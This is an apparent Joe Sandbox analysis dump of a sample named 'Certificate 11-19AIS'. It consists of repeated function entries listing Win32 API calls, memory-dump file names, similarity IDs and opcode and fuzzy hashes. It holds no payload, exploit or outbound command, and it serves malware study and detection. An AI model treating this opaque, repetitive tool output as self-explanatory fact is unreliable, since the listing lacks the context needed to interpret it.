                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0084DC00,00000000,?,?,?,?), ref: 0081A6D8
                                                                              • GetWindowLongW.USER32 ref: 0081A6F5
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0081A705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 9e2a3c9f0c7eab7bfa5388bdd81ff6d36df5d06e6e19a36276282404e0128153
                                                                              • Instruction ID: a6356ae843f33170423a1f9e04f33872ea5af0f4a07355abed067d473465efe3
                                                                              • Opcode Fuzzy Hash: 9e2a3c9f0c7eab7bfa5388bdd81ff6d36df5d06e6e19a36276282404e0128153
                                                                              • Instruction Fuzzy Hash: 1E319C31201209ABDB258E78DC45BEA77ADFF59324F254719F8B9D22E0D734E9908B50
                                                                              Function 0081A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0081A15E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0081A172
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0081A196
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: f475c6106c1e6b1a2b6f7d50b446b0bc85a67a15905647d8d863dca0103b1409
                                                                              • Instruction ID: 1ee54ebc9827bc5430948eca9667dcabc22709efa4acc7d3ded2dc7c94584b53
                                                                              • Opcode Fuzzy Hash: f475c6106c1e6b1a2b6f7d50b446b0bc85a67a15905647d8d863dca0103b1409
                                                                              • Instruction Fuzzy Hash: 8A217C32510218BBDF159EA4CC86FEA3B69FF48714F110214FA56AB190D6B5AC958BA0
                                                                              Function 0081A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0081A941
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0081A94F
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0081A956
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: 1755223dd48651f1264d4f8b8f27d3be6067792228b0fb3b32e0bbf0f1cf8bbd
                                                                              • Instruction ID: 175c76c2c9c1c9bc36ffeaca9504fcafdddc864aaaa18146f4e61815221abd58
                                                                              • Opcode Fuzzy Hash: 1755223dd48651f1264d4f8b8f27d3be6067792228b0fb3b32e0bbf0f1cf8bbd
                                                                              • Instruction Fuzzy Hash: 7E21AEB5200209AFDB14DF28DC86DA737ACFF6A3A4B050059FA15DB261DB31EC918B61
                                                                              Function 008199A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00819A30
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00819A40
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00819A65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 9dfb42ba0220d29cd120cd6b7f98936f9f718fcbb86fb7ac4f4b7cbb12144aee
                                                                              • Instruction ID: 38aa2eb6460acb13b242f65079064a7e2ffa5fdd7b8534fed5729c375002d539
                                                                              • Opcode Fuzzy Hash: 9dfb42ba0220d29cd120cd6b7f98936f9f718fcbb86fb7ac4f4b7cbb12144aee
                                                                              • Instruction Fuzzy Hash: 8221B072610118BFDF218F54DC95EFB3BAEFF89750F018128F9959B190C6719C9187A0
                                                                              Function 0081A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0081A46D
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0081A482
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0081A48F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: 9919c633d7a79f064ce7271929babdf5e03ae4733dac4b87fe028b078b07bdc3
                                                                              • Instruction ID: 654c1bbdf9c134cb92256ebc4cc58b9589fb05300dd9f9d8bdff033ae08a84e3
                                                                              • Opcode Fuzzy Hash: 9919c633d7a79f064ce7271929babdf5e03ae4733dac4b87fe028b078b07bdc3
                                                                              • Instruction Fuzzy Hash: 0811E771200208BEEF245F64CC49FEB376DFF89754F024118FA55E6091D2B6E851C724
                                                                              Function 007D2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,007D2350,?), ref: 007D22A1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007D22A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 2574300362-340411864
                                                                              • Opcode ID: bdd0d4f1d67667da2e5dffb77fefb2e9426be271d4da2ae1c7473543dc58efef
                                                                              • Instruction ID: 3d24d8132d27a99425002a38e307a29ecc0e579c2f316f0099de828c14e2a4b4
                                                                              • Opcode Fuzzy Hash: bdd0d4f1d67667da2e5dffb77fefb2e9426be271d4da2ae1c7473543dc58efef
                                                                              • Instruction Fuzzy Hash: 34E01A70694300EBDB105F70ED8DB197A64B750702F404420F10AE61A8CBF8D091DF65
                                                                              Function 007D235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007D2276), ref: 007D2376
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007D237D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 2574300362-2819208100
                                                                              • Opcode ID: 6eef71c45705d5b9ac8f9b30c0629b442cb665e751b268c3250f5ada28457e90
                                                                              • Instruction ID: 37e305bf330457fce9edc124d67b23a8cf8cb5cea5a8f3696758b89c9c39aefe
                                                                              • Opcode Fuzzy Hash: 6eef71c45705d5b9ac8f9b30c0629b442cb665e751b268c3250f5ada28457e90
                                                                              • Instruction Fuzzy Hash: E1E0BD70688300EBDB206F60FE0DB053A68B760702F510824F10DEA2B4CBFD94919E65
                                                                              Function 0082AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime__swprintf
                                                                              • String ID: %.3d$WIN_XPe
                                                                              • API String ID: 2070861257-2409531811
                                                                              • Opcode ID: d642757dca5c1664d6ad1a80c2ba97b792442777511e0bbdb0634a0a63092fb2
                                                                              • Instruction ID: b7326a33818cdcad5c7f4dc18d7b63e51f3c934a37cb8115bd575f99b97503b5
                                                                              • Opcode Fuzzy Hash: d642757dca5c1664d6ad1a80c2ba97b792442777511e0bbdb0634a0a63092fb2
                                                                              • Instruction Fuzzy Hash: 8DE012B180462CEBCB159750ED05DFA737CFF04745F5004D2F906E1110D6399BD4AA12
                                                                              Function 00812205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008121FB,?,008123EF), ref: 00812213
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00812225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetProcessId$kernel32.dll
                                                                              • API String ID: 2574300362-399901964
                                                                              • Opcode ID: b57204b5b6ac3c09df1689fc3d4d973aedd8eb4027ec9d0db8fcc28afa8ceabd
                                                                              • Instruction ID: 2f7e6b6cc4d4f169f5629c31770911bde77721cac2ae7460fa75e880e6ca066b
                                                                              • Opcode Fuzzy Hash: b57204b5b6ac3c09df1689fc3d4d973aedd8eb4027ec9d0db8fcc28afa8ceabd
                                                                              • Instruction Fuzzy Hash: B2D0A7344007129FC7214F30F808649F6D8FF04304B01882AE866E2250D774D8C08650
                                                                              Function 007B42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,007B42EC,?,007B42AA,?), ref: 007B4304
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4316
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              • Opcode ID: 2f69f77371584bea5baa04b61ef09711fdd578207a9229d9eb5ba221c0d07a98
                                                                              • Instruction ID: d17fc4f550c97569f18b7d827dbb95dbd74ec495c8c4fbf2b14bfcc604a3da3c
                                                                              • Opcode Fuzzy Hash: 2f69f77371584bea5baa04b61ef09711fdd578207a9229d9eb5ba221c0d07a98
                                                                              • Instruction Fuzzy Hash: 0FD0A730400B129FC7204F20F80D745B6E4FB04301B05882AE451E3261D7B8CC808A50
                                                                              Function 007B434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,007B41BB,007B4341,?,007B422F,?,007B41BB,?,?,?,?,007B39FE,?,00000001), ref: 007B4359
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B436B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              • Opcode ID: 76ff3975dc54a8e6625c999d12b67cda6dd66881057dc9c829960d75dede66c4
                                                                              • Instruction ID: ec37fb10dee086201320be01c518cdc243a9571d260c4e418358b5bd11664837
                                                                              • Opcode Fuzzy Hash: 76ff3975dc54a8e6625c999d12b67cda6dd66881057dc9c829960d75dede66c4
                                                                              • Instruction Fuzzy Hash: 27D0A7304007229FC7204F30F808B45B6D4FB11715B05882AE491E3251D7B8D8808A50
                                                                              Function 007F0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007F052F,?,007F06D7), ref: 007F0572
                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007F0584
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                              • API String ID: 2574300362-1587604923
                                                                              • Opcode ID: 6a0271449b93d7719cfdf6daad847d71f8eb48f4ac28ba8a147337c97878aad8
                                                                              • Instruction ID: 85506e016bee09412dd7c5960e8fddaa33d5c0fbd62bd506aeae0bf3f30ed513
                                                                              • Opcode Fuzzy Hash: 6a0271449b93d7719cfdf6daad847d71f8eb48f4ac28ba8a147337c97878aad8
                                                                              • Instruction Fuzzy Hash: C2D05E30400B129BC7205F20F808A16B7E4BB04301B118859E951D2350DAB8C4848AA0
                                                                              Function 007F0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,007F051D,?,007F05FE), ref: 007F0547
                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007F0559
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                              • API String ID: 2574300362-1071820185
                                                                              • Opcode ID: 464212b6da2f3750df4b304cfcc9f39c7fc46358e93569e71f990a22af5bf3ea
                                                                              • Instruction ID: 06724dedb77f2066b73eaec52977c8b486564881297603abd18ee18da7d33074
                                                                              • Opcode Fuzzy Hash: 464212b6da2f3750df4b304cfcc9f39c7fc46358e93569e71f990a22af5bf3ea
                                                                              • Instruction Fuzzy Hash: 04D0A734400B12DFC7309F20F808A15B6E4FB00301B11C85DE456D3351DAF8C8808A90
                                                                              Function 0080ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0080ECBE,?,0080EBBB), ref: 0080ECD6
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0080ECE8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              • Opcode ID: 9e4f0c2fd391880c00646b3281fea6a3f2af6fbbec7051e05fbf493d6a0faa8b
                                                                              • Instruction ID: 0728ea75914cf85e04b4569d416871598499967be4fb16254b924d30718652b0
                                                                              • Opcode Fuzzy Hash: 9e4f0c2fd391880c00646b3281fea6a3f2af6fbbec7051e05fbf493d6a0faa8b
                                                                              • Instruction Fuzzy Hash: 01D0A730411723DFDB305F60FC49607B7E4FB00300B058C2AF855D2291DF74C8808650
                                                                              Function 0080BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0080BAD3,00000001,0080B6EE,?,0084DC00), ref: 0080BAEB
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0080BAFD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              • Opcode ID: 02199a99437acf720cd86a8bf5c90adc31c65b56a5fa48d708b5088db3081384
                                                                              • Instruction ID: 95fc6522b1b82de9ecf32e463df2d68933fd4f693abbc0cc1d85306da38d7dee
                                                                              • Opcode Fuzzy Hash: 02199a99437acf720cd86a8bf5c90adc31c65b56a5fa48d708b5088db3081384
                                                                              • Instruction Fuzzy Hash: F7D0A730810B129FC7705F20FC48B15B7D4FB00310B01882AE853E2290D774C880CA50
                                                                              Function 00813BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00813BD1,?,00813E06), ref: 00813BE9
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00813BFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
